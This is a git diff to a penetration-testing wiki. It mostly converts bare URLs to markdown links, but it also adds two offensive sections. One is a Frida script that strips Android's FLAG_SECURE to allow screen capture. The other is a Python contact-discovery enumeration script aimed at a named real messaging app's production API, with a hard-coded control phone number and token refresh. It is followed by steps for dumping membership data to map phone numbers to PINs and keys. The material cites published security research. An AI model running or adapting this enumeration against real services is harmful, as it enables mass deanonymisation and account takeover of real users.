diff --git a/src/crypto/ctf-workflow/README.md b/src/crypto/ctf-workflow/README.md
index 9e6b2204e62..2e187549fca 100644
--- a/src/crypto/ctf-workflow/README.md
+++ b/src/crypto/ctf-workflow/README.md
@@ -17,12 +17,12 @@ These are useful when the task is identification and layer peeling, or when you
 ### Hash lookups
 
 - Google the hash (surprisingly effective).
-- https://crackstation.net/
-- https://md5decrypt.net/
-- https://hashes.org/search.php
-- https://www.onlinehashcrack.com/
-- https://gpuhash.me/
-- http://hashtoolkit.com/reverse-hash
+- [https://crackstation.net/](https://crackstation.net/)
+- [https://md5decrypt.net/](https://md5decrypt.net/)
+- [https://hashes.org/search.php](https://hashes.org/search.php)
+- [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com/)
+- [https://gpuhash.me/](https://gpuhash.me/)
+- [http://hashtoolkit.com/reverse-hash](http://hashtoolkit.com/reverse-hash)
 
 ### Identification helpers
 
@@ -71,8 +71,8 @@ Common tells:
 
 ### Vigenère
 
-- https://www.dcode.fr/vigenere-cipher
-- https://www.guballa.de/vigenere-solver
+- [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher)
+- [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver)
 
 ### Bacon cipher
 
@@ -153,8 +153,8 @@ CTFs sometimes give `openssl enc` outputs (header often begins with `Salted__`).
 
 Bruteforce helpers:
 
-- https://github.com/glv2/bruteforce-salted-openssl
-- https://github.com/carlospolop/easy_BFopensslCTF
+- [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl)
+- [https://github.com/carlospolop/easy_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF)
 
 ### General toolset
 
diff --git a/src/crypto/symmetric/README.md b/src/crypto/symmetric/README.md
index a9cdc930a54..c5f588462a2 100644
--- a/src/crypto/symmetric/README.md
+++ b/src/crypto/symmetric/README.md
@@ -171,7 +171,7 @@ If you know any plaintext segment at position `i`, you can recover keystream byt
 
 Autosolvers:
 
-- https://wiremask.eu/tools/xor-cracker/
+- [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/)
 
 ### RC4
 
diff --git a/src/crypto/tls-and-certificates/README.md b/src/crypto/tls-and-certificates/README.md
index 88096fdc472..8bfcd95f743 100644
--- a/src/crypto/tls-and-certificates/README.md
+++ b/src/crypto/tls-and-certificates/README.md
@@ -45,6 +45,6 @@ openssl pkcs12 -in file.pfx -out out.pem
 
 ### CT logs
 
-- https://crt.sh/
+- [https://crt.sh/](https://crt.sh/)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md
index 9b64cee52f7..dc54d5880e8 100644
--- a/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md
+++ b/src/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md
@@ -204,6 +204,64 @@ adb install-multiple split1.apk split2.apk ...
 ```
 - For distribution, you can merge splits into a single APK with APKEditor, then align/sign
 
+## Clearing FLAG_SECURE during dynamic analysis
+
+Apps that call `getWindow().setFlags(LayoutParams.FLAG_SECURE, LayoutParams.FLAG_SECURE)` prevent screenshots, remote displays and even Android's recent-task snapshots. When Freedom Chat enforced this flag the only way to document the leaks was to tamper with the window at runtime. A reliable pattern is:
+
+- Hook every `Window` overload that can re-apply the flag (`setFlags`, `addFlags`, `setAttributes`) and mask out bit `0x00002000` (`WindowManager.LayoutParams.FLAG_SECURE`).
+- After each activity resumes, schedule a UI-thread call to `clearFlags(FLAG_SECURE)` so Dialogs/Fragments created later inherit the unlocked state.
+- Apps built with React Native / Flutter often create nested windows; hook `android.app.Dialog`/`android.view.View` helpers or walk `getWindow().peekDecorView()` if you still see black frames.
+
+<details>
+<summary>Frida hook clearing Window.FLAG_SECURE</summary>
+
+```javascript
+Java.perform(function () {
+  var LayoutParams = Java.use("android.view.WindowManager$LayoutParams");
+  var FLAG_SECURE = LayoutParams.FLAG_SECURE.value;
+  var Window = Java.use("android.view.Window");
+  var Activity = Java.use("android.app.Activity");
+
+  function strip(value) {
+    var masked = value & (~FLAG_SECURE);
+    if (masked !== value) {
+      console.log("[-] Stripped FLAG_SECURE from 0x" + value.toString(16));
+    }
+    return masked;
+  }
+
+  Window.setFlags.overload('int', 'int').implementation = function (flags, mask) {
+    return this.setFlags.call(this, strip(flags), strip(mask));
+  };
+
+  Window.addFlags.implementation = function (flags) {
+    return this.addFlags.call(this, strip(flags));
+  };
+
+  Window.setAttributes.implementation = function (attrs) {
+    attrs.flags.value = strip(attrs.flags.value);
+    return this.setAttributes.call(this, attrs);
+  };
+
+  Activity.onResume.implementation = function () {
+    this.onResume();
+    var self = this;
+    Java.scheduleOnMainThread(function () {
+      try {
+        self.getWindow().clearFlags(FLAG_SECURE);
+        console.log("[+] Cleared FLAG_SECURE on " + self.getClass().getName());
+      } catch (err) {
+        console.log("[!] clearFlags failed: " + err);
+      }
+    });
+  };
+});
+```
+
+</details>
+
+Run the script with `frida -U -f <package> -l disable-flag-secure.js --no-pause`, interact with the UI, and screenshots/recordings will work again. Because everything happens on the UI thread there is no flicker, and you can still combine the hook with HTTP Toolkit/Burp to capture the traffic that revealed the `/channel` PIN leak.
+
 ## Tutorials
 
 ### [Tutorial 1](frida-tutorial-1.md)
@@ -395,5 +453,7 @@ Java.choose("com.example.a11x256.frida_test.my_activity", {
 - [Library injection for debuggable Android apps (blog)](https://koz.io/library-injection-for-debuggable-android-apps/)
 - [jdwp-lib-injector (original idea/tool)](https://github.com/ikoz/jdwp-lib-injector)
 - [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier)
+- ["Super secure" MAGA-themed messaging app leaks everyone’s phone number](https://ericdaigle.ca/posts/super-secure-maga-messaging-app-leaks-everyones-phone-number/)
+- [Android Frida Hooking: Disabling FLAG_SECURE](https://www.securify.nl/en/blog/android-frida-hooking-disabling-flagsecure/)
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/web-vulnerabilities-methodology.md b/src/pentesting-web/web-vulnerabilities-methodology.md
index 7c1db32a17e..00ce53c73d9 100644
--- a/src/pentesting-web/web-vulnerabilities-methodology.md
+++ b/src/pentesting-web/web-vulnerabilities-methodology.md
@@ -141,6 +141,74 @@ These vulnerabilities might help to exploit other vulnerabilities.
 - [ ] [**Parameter Pollution**](parameter-pollution.md)
 - [ ] [**Unicode Normalization vulnerability**](unicode-injection/index.html)
 
+### Contact Discovery & Membership Enumeration APIs
+
+Messaging apps usually expose two dangerous classes of endpoints:
+
+- **Contact discovery** (`/user/numbers`, `/contacts/lookup`...) accepts an arbitrary array of identifiers and returns every entry that already has an account. When there is no rate limiting or payload cap the endpoint becomes an oracle that can enumerate an entire numbering plan.
+- **Membership or participants** endpoints (`/channel`, `/groups/<id>/members`) often return deeply nested `user` objects for each member. Developers frequently forget to strip secrets (PINs, recovery tokens, Seald keys, device fingerprints) because they assume only trusted clients will call them.
+
+A practical workflow (used against Freedom Chat) is:
+
+1. Generate the whole `{country code}{area code}{subscriber}` space but follow local numbering rules (NANP numbers may not start with 0/1 in the central office field).
+2. Send the numbers in huge tranches (40,000 per POST worked) together with a **control account** that is guaranteed to exist. When the JSON response contains more than one `uid`, you know another account matched that batch.
+3. Auto-refresh JWTs whenever the API returns `401`/`Unauthorized`, and log requests whose latency grows past a few seconds to detect soft throttling.
+4. Dump channel membership pages and join both datasets on `uid` to recover `phoneNumber → {uid, sealdKey, pin}` mappings for the whole user base.
+
+<details>
+<summary>Chunked contact-discovery enumeration with control account</summary>
+
+```python
+import itertools
+import requests
+import datetime
+
+digits = "0123456789"
+seven_digits = ["".join(d) for d in itertools.product(digits, repeat=7) if d[0] not in "01"]
+area_codes = ["201", "202", "203", "205", "206"]
+control = "+13322699625"
+
+
+def chunk(lst, size):
+    for i in range(0, len(lst), size):
+        yield lst[i:i + size]
+
+
+def spray_area(ac, access_token, refresh_token):
+    numbers = ["+1{}{}".format(ac, suffix) for suffix in seven_digits]
+    for slice in chunk(numbers, 40000):
+        slice.append(control)
+        payload = {"numbers": slice}
+        headers = {
+            "authorization": f"Bearer {access_token}",
+            "accept": "application/json, text/plain, */*",
+        }
+        resp = requests.post(
+            "https://eagle.freedomchat.com/user/numbers",
+            json=payload,
+            headers=headers,
+            timeout=10,
+        )
+        if resp.status_code == 401 or "Unauthorized" in resp.text:
+            tokens = requests.post(
+                "https://eagle.freedomchat.com/auth/refresh",
+                json={"refreshToken": refresh_token},
+                timeout=10,
+            ).json()
+            access_token, refresh_token = tokens["accessToken"], tokens["refreshToken"]
+            continue
+        hits = resp.json()
+        if len(hits) > 1:  # control uid plus newfound accounts
+            print(f"{ac}: {hits}")
+        if resp.elapsed > datetime.timedelta(seconds=3):
+            print(f"Slow response {resp.elapsed}")
+
+```
+
+</details>
+
+After enumerating `uid`s, enumerate `/channel?take=1000&skip=0` (or similar listing endpoints) and inspect `members[i].user`. Any field that allows account recovery (PINs, MFAs, `pinBackoffNb`, device keys) should be considered compromised if it lands in client responses. Joining both payloads deanonymises users, links them to political preferences, and bypasses “PIN-to-restore” flows because the PIN now travels with the phone number.
+
 ### **Web Servers & Middleware**
 
 Misconfigurations in the edge stack often unlock more impactful bugs in the application layer.
@@ -211,4 +279,8 @@ Modern applications extend into browsers, wallets, and automation pipelines—ke
 - [ ] [**wfuzz Web Fuzzing**](web-tool-wfuzz.md)
 
 
+## References
+
+- ["Super secure" MAGA-themed messaging app leaks everyone’s phone number](https://ericdaigle.ca/posts/super-secure-maga-messaging-app-leaks-everyones-phone-number/)
+
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/stego/audio/README.md b/src/stego/audio/README.md
index 6f28c681ff5..6dea1ccd051 100644
--- a/src/stego/audio/README.md
+++ b/src/stego/audio/README.md
@@ -32,7 +32,7 @@ Spectrogram stego hides data by shaping energy over time/frequency so it becomes
 
 Primary tool for spectrogram inspection:
 
-- https://www.sonicvisualiser.org/
+- [https://www.sonicvisualiser.org/](https://www.sonicvisualiser.org/)
 
 ### Alternatives
 
@@ -71,7 +71,7 @@ python3 WavSteg.py -r -b 2 -s sound.wav -o out.bin
 
 ### DeepSound
 
-- http://jpinsoft.net/deepsound/download.aspx
+- [http://jpinsoft.net/deepsound/download.aspx](http://jpinsoft.net/deepsound/download.aspx)
 
 ## DTMF / dial tones
 
@@ -81,7 +81,7 @@ DTMF encodes characters as pairs of fixed frequencies (telephone keypad). If the
 
 Online decoders:
 
-- https://unframework.github.io/dtmf-detect/
-- http://dialabc.com/sound/detect/index.html
+- [https://unframework.github.io/dtmf-detect/](https://unframework.github.io/dtmf-detect/)
+- [http://dialabc.com/sound/detect/index.html](http://dialabc.com/sound/detect/index.html)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/stego/images/README.md b/src/stego/images/README.md
index 7f71290853f..01a962cc107 100644
--- a/src/stego/images/README.md
+++ b/src/stego/images/README.md
@@ -153,13 +153,13 @@ High-signal locations:
 
 If you are specifically facing steghide payloads in JPEGs, consider using `stegseek` (faster bruteforce than older scripts):
 
-- https://github.com/RickdeJager/stegseek
+- [https://github.com/RickdeJager/stegseek](https://github.com/RickdeJager/stegseek)
 
 ### Error Level Analysis
 
 ELA highlights different recompression artifacts; it can point you to regions that were edited, but it’s not a stego detector by itself:
 
-- https://29a.ch/sandbox/2012/imageerrorlevelanalysis/
+- [https://29a.ch/sandbox/2012/imageerrorlevelanalysis/](https://29a.ch/sandbox/2012/imageerrorlevelanalysis/)
 
 ## Animated images
 
diff --git a/src/stego/workflow/README.md b/src/stego/workflow/README.md
index d53cd83ac12..60b5aca9be2 100644
--- a/src/stego/workflow/README.md
+++ b/src/stego/workflow/README.md
@@ -155,15 +155,15 @@ math.isqrt(2500)  # 50
 
 Binary-to-image helper:
 
-- https://www.dcode.fr/binary-image
+- [https://www.dcode.fr/binary-image](https://www.dcode.fr/binary-image)
 
 #### Braille
 
-- https://www.branah.com/braille-translator
+- [https://www.branah.com/braille-translator](https://www.branah.com/braille-translator)
 
 ## Reference lists
 
-- https://0xrick.github.io/lists/stego/
-- https://github.com/DominicBreuker/stego-toolkit
+- [https://0xrick.github.io/lists/stego/](https://0xrick.github.io/lists/stego/)
+- [https://github.com/DominicBreuker/stego-toolkit](https://github.com/DominicBreuker/stego-toolkit)
 
 {{#include ../../banners/hacktricks-training.md}}